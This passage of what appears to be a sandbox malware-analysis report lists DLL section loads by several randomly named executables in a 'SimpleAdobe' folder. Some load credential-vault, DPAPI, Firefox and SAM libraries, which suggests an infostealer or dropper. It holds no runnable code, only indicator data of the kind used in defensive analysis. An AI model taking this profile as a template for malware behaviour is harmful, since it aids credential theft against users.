Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: msimg32.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: wininet.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: mozglue.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: wsock32.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: propsys.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: edputil.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: slc.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: sppc.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: pcacli.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: mpr.dll
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: msimg32.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: winmm.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: powrprof.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: umpdc.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: winsta.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: sxs.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: amsi.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: wininet.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: devobj.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: webio.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: schannel.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: winmm.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: wininet.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: mstask.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: mpr.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: dui70.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: duser.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: chartv.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: oleacc.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: winsta.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: textshaping.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: propsys.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: edputil.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: slc.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: userenv.dll
